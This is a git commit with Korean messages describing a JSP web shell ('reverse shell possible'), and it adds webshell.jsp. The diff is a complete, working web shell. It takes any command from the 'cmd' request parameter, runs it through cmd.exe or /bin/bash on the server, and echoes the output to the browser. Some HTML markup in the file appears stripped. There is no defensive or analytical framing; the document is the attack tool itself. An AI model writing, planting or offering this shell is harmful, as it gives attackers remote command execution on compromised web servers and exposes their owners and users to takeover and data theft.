commit 4b3698ef966a9fa2864756c5485855b43a4c1402
Author: Roronoawjd <105417063+Roronoawjd@users.noreply.github.com>
Date: Mon Sep 18 18:14:26 2023 +0900
확장자 jsp 웹쉘
jsp 웹쉘(리버스 쉘 가능)
diff --git a/webshell.jsp b/webshell.jsp
new file mode 100644
index 0000000..286faa4
--- /dev/null
+++ b/webshell.jsp
@@ -0,0 +1,55 @@
+<%@ page import="java.io.*, java.nio.charset.StandardCharsets" %>
+<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
+
+
+
+
+ Command Execution
+
+
+
+
+ <%
+ if (request.getParameter("cmd") != null)
+ {
+ String osName = System.getProperty("os.name").toLowerCase();
+ String command = request.getParameter("cmd");
+ out.println(""+"명령어 : " + request.getParameter("cmd") + "" + "
");
+ // Windows인 경우
+ if (osName.indexOf("windows") != -1) {
+ String[] cmdArray = {"cmd.exe", "/C", command};
+ ProcessBuilder pb = new ProcessBuilder(cmdArray);
+ pb.redirectErrorStream(true);
+ Process process = pb.start();
+
+ InputStreamReader in = new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8);
+ BufferedReader br = new BufferedReader(in);
+
+ String line;
+ while ((line = br.readLine()) != null) {
+ out.println(line +"
");
+ }
+ }
+ // 다른 OS인 경우 (Linux, macOS 등)
+ else {
+ String[] cmdArray = {"/bin/bash", "-c", command};
+ ProcessBuilder pb = new ProcessBuilder(cmdArray);
+ pb.redirectErrorStream(true);
+ Process process = pb.start();
+
+ InputStreamReader in = new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8);
+ BufferedReader br = new BufferedReader(in);
+
+ String line;
+ while ((line = br.readLine()) != null) {
+ out.println(line +"
");
+ }
+ }
+ }
+ %>
+
+
+